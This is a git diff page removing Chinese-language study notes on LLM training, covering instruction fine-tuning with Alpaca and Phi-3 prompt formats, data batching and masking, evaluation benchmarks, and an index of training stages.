||||
|
||||
Note how for each batch we are only interested in the **logits of the last token predicted**.
|
||||
|
||||
## Complete GPT2 fine-tune classification code
|
||||
|
||||
You can find all the code to fine-tune GPT2 to be a spam classifier in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb)
|
||||
|
||||
## References
|
||||
|
||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
||||
|
||||
@ -1,100 +0,0 @@
|
||||
# 7.2. 微调以遵循指令
|
||||
|
||||
> [!TIP]
|
||||
> 本节的目标是展示如何**微调一个已经预训练的模型以遵循指令**,而不仅仅是生成文本,例如,作为聊天机器人响应任务。
|
||||
|
||||
## 数据集
|
||||
|
||||
为了微调一个 LLM 以遵循指令,需要有一个包含指令和响应的数据集来微调 LLM。有不同的格式可以训练 LLM 以遵循指令,例如:
|
||||
|
||||
- Apply Alpaca 提示样式示例:
|
||||
```csharp
|
||||
Below is an instruction that describes a task. Write a response that appropriately completes the request.
|
||||
|
||||
### Instruction:
|
||||
Calculate the area of a circle with a radius of 5 units.
|
||||
|
||||
### Response:
|
||||
The area of a circle is calculated using the formula \( A = \pi r^2 \). Plugging in the radius of 5 units:
|
||||
|
||||
\( A = \pi (5)^2 = \pi \times 25 = 25\pi \) square units.
|
||||
```
|
||||
- Phi-3 提示样式示例:
|
||||
```vbnet
|
||||
<|User|>
|
||||
Can you explain what gravity is in simple terms?
|
||||
|
||||
<|Assistant|>
|
||||
Absolutely! Gravity is a force that pulls objects toward each other.
|
||||
```
|
||||
使用这些数据集训练LLM,而不仅仅是原始文本,可以帮助LLM理解它需要对收到的问题给出具体的回答。
|
||||
|
||||
因此,处理包含请求和答案的数据集时,首先要做的事情之一是将这些数据建模为所需的提示格式,例如:
|
||||
```python
|
||||
# Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
|
||||
def format_input(entry):
|
||||
instruction_text = (
|
||||
f"Below is an instruction that describes a task. "
|
||||
f"Write a response that appropriately completes the request."
|
||||
f"\n\n### Instruction:\n{entry['instruction']}"
|
||||
)
|
||||
|
||||
input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else ""
|
||||
|
||||
return instruction_text + input_text
|
||||
|
||||
model_input = format_input(data[50])
|
||||
|
||||
desired_response = f"\n\n### Response:\n{data[50]['output']}"
|
||||
|
||||
print(model_input + desired_response)
|
||||
```
|
||||
然后,像往常一样,需要将数据集分为训练集、验证集和测试集。
|
||||
|
||||
## 批处理和数据加载器
|
||||
|
||||
然后,需要将所有输入和期望输出进行批处理以进行训练。为此,需要:
|
||||
|
||||
- 对文本进行标记化
|
||||
- 将所有样本填充到相同的长度(通常长度将与用于预训练LLM的上下文长度相同)
|
||||
- 在自定义合并函数中将输入向右移动1以创建期望的标记
|
||||
- 用-100替换一些填充标记,以将其排除在训练损失之外:在第一个`endoftext`标记之后,将所有其他`endoftext`标记替换为-100(因为使用`cross_entropy(...,ignore_index=-100)`意味着它将忽略目标为-100的情况)
|
||||
- \[可选\] 使用-100掩盖所有属于问题的标记,以便LLM仅学习如何生成答案。在应用Alpaca风格时,这将意味着掩盖所有内容直到`### Response:`
|
||||
|
||||
创建好这些后,是时候为每个数据集(训练、验证和测试)创建数据加载器了。
|
||||
|
||||
## 加载预训练LLM & 微调 & 损失检查
|
||||
|
||||
需要加载一个预训练的LLM进行微调。这在其他页面中已经讨论过。然后,可以使用之前使用的训练函数来微调LLM。
|
||||
|
||||
在训练过程中,还可以查看训练损失和验证损失在各个时期的变化,以查看损失是否在减少以及是否发生了过拟合。\
|
||||
请记住,过拟合发生在训练损失减少但验证损失没有减少甚至增加时。为了避免这种情况,最简单的方法是在这种行为开始的时期停止训练。
|
||||
|
||||
## 响应质量
|
||||
|
||||
由于这不是一个分类微调,因此不太可能信任损失变化,因此检查测试集中的响应质量也很重要。因此,建议从所有测试集中收集生成的响应并**手动检查其质量**,以查看是否存在错误答案(请注意,LLM可能正确生成响应句子的格式和语法,但给出完全错误的响应。损失变化不会反映这种行为)。\
|
||||
请注意,也可以通过将生成的响应和期望的响应传递给**其他LLM并要求它们评估响应**来进行此审查。
|
||||
|
||||
验证响应质量的其他测试:
|
||||
|
||||
1. **测量大规模多任务语言理解 (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU评估模型在57个学科(包括人文学科、科学等)中的知识和解决问题的能力。它使用多项选择题在不同难度级别(从初级到高级专业)评估理解能力。
|
||||
2. [**LMSYS聊天机器人竞技场**](https://arena.lmsys.org): 该平台允许用户并排比较不同聊天机器人的响应。用户输入提示,多个聊天机器人生成可以直接比较的响应。
|
||||
3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval是一个自动评估框架,其中像GPT-4这样的高级LLM评估其他模型对各种提示的响应。
|
||||
4. **通用语言理解评估 (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE是九个自然语言理解任务的集合,包括情感分析、文本蕴含和问答。
|
||||
5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** 在GLUE的基础上,SuperGLUE包括更具挑战性的任务,旨在对当前模型构成困难。
|
||||
6. **超越模仿游戏基准 (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench是一个大规模基准,包含200多个任务,测试模型在推理、翻译和问答等领域的能力。
|
||||
7. **语言模型的整体评估 (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM提供了在准确性、鲁棒性和公平性等各种指标上的综合评估。
|
||||
8. [**OpenAI评估**](https://github.com/openai/evals)**:** OpenAI的开源评估框架,允许在自定义和标准化任务上测试AI模型。
|
||||
9. [**HumanEval**](https://github.com/openai/human-eval)**:** 一组用于评估语言模型代码生成能力的编程问题。
|
||||
10. **斯坦福问答数据集 (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD由关于维基百科文章的问题组成,模型必须理解文本以准确回答。
|
||||
11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** 一个大规模的琐事问题和答案数据集,以及证据文档。
|
||||
|
||||
还有很多很多其他的
|
||||
|
||||
## 跟随指令微调代码
|
||||
|
||||
您可以在[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)找到执行此微调的代码示例。
|
||||
|
||||
## 参考文献
|
||||
|
||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
||||
@ -1,98 +0,0 @@
|
||||
# LLM 训练 - 数据准备
|
||||
|
||||
**这些是我从非常推荐的书中做的笔记** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **以及一些额外的信息。**
|
||||
|
||||
## 基本信息
|
||||
|
||||
您应该先阅读这篇文章,以了解一些您应该知道的基本概念:
|
||||
|
||||
{{#ref}}
|
||||
0.-basic-llm-concepts.md
|
||||
{{#endref}}
|
||||
|
||||
## 1. 分词
|
||||
|
||||
> [!TIP]
|
||||
> 这个初始阶段的目标非常简单:**以某种有意义的方式将输入划分为标记(ID)。**
|
||||
|
||||
{{#ref}}
|
||||
1.-tokenizing.md
|
||||
{{#endref}}
|
||||
|
||||
## 2. 数据采样
|
||||
|
||||
> [!TIP]
|
||||
> 这个第二阶段的目标非常简单:**对输入数据进行采样,并为训练阶段准备数据,通常通过将数据集分成特定长度的句子,并生成预期的响应。**
|
||||
|
||||
{{#ref}}
|
||||
2.-data-sampling.md
|
||||
{{#endref}}
|
||||
|
||||
## 3. 标记嵌入
|
||||
|
||||
> [!TIP]
|
||||
> 这个第三阶段的目标非常简单:**为词汇表中的每个标记分配一个所需维度的向量以训练模型。** 词汇表中的每个单词将在 X 维空间中有一个点。\
|
||||
> 请注意,最初每个单词在空间中的位置是“随机”初始化的,这些位置是可训练的参数(在训练过程中会得到改善)。
|
||||
>
|
||||
> 此外,在标记嵌入过程中**创建了另一层嵌入**,它表示(在这种情况下)**单词在训练句子中的绝对位置**。这样,句子中不同位置的单词将具有不同的表示(含义)。
|
||||
|
||||
{{#ref}}
|
||||
3.-token-embeddings.md
|
||||
{{#endref}}
|
||||
|
||||
## 4. 注意机制
|
||||
|
||||
> [!TIP]
|
||||
> 这个第四阶段的目标非常简单:**应用一些注意机制**。这些将是许多**重复的层**,将**捕捉词汇表中单词与当前用于训练 LLM 的句子中其邻居的关系**。\
|
||||
> 为此使用了许多层,因此许多可训练的参数将捕捉这些信息。
|
||||
|
||||
{{#ref}}
|
||||
4.-attention-mechanisms.md
|
||||
{{#endref}}
|
||||
|
||||
## 5. LLM 架构
|
||||
|
||||
> [!TIP]
|
||||
> 这个第五阶段的目标非常简单:**开发完整 LLM 的架构**。将所有内容组合在一起,应用所有层并创建所有函数以生成文本或将文本转换为 ID 及其反向操作。
|
||||
>
|
||||
> 该架构将用于训练和预测文本。
|
||||
|
||||
{{#ref}}
|
||||
5.-llm-architecture.md
|
||||
{{#endref}}
|
||||
|
||||
## 6. 预训练与加载模型
|
||||
|
||||
> [!TIP]
|
||||
> 这个第六阶段的目标非常简单:**从头开始训练模型**。为此,将使用之前的 LLM 架构,并通过定义的损失函数和优化器对数据集进行循环,以训练模型的所有参数。
|
||||
|
||||
{{#ref}}
|
||||
6.-pre-training-and-loading-models.md
|
||||
{{#endref}}
|
||||
|
||||
## 7.0. LoRA 在微调中的改进
|
||||
|
||||
> [!TIP]
|
||||
> 使用**LoRA 大大减少了微调**已训练模型所需的计算。
|
||||
|
||||
{{#ref}}
|
||||
7.0.-lora-improvements-in-fine-tuning.md
|
||||
{{#endref}}
|
||||
|
||||
## 7.1. 分类的微调
|
||||
|
||||
> [!TIP]
|
||||
> 本节的目标是展示如何微调一个已经预训练的模型,以便 LLM 不再生成新文本,而是给出**给定文本被分类到每个给定类别的概率**(例如,文本是否为垃圾邮件)。
|
||||
|
||||
{{#ref}}
|
||||
7.1.-fine-tuning-for-classification.md
|
||||
{{#endref}}
|
||||
|
||||
## 7.2. 按照指令进行微调
|
||||
|
||||
> [!TIP]
|
||||
> 本节的目标是展示如何**微调一个已经预训练的模型以遵循指令**,而不仅仅是生成文本,例如,作为聊天机器人响应任务。
|
||||
|
||||
{{#ref}}
|
||||
7.2.-fine-tuning-to-follow-instructions.md
|
||||
{{#endref}}
|
||||
Loading…
x
Reference in New Issue
Block a user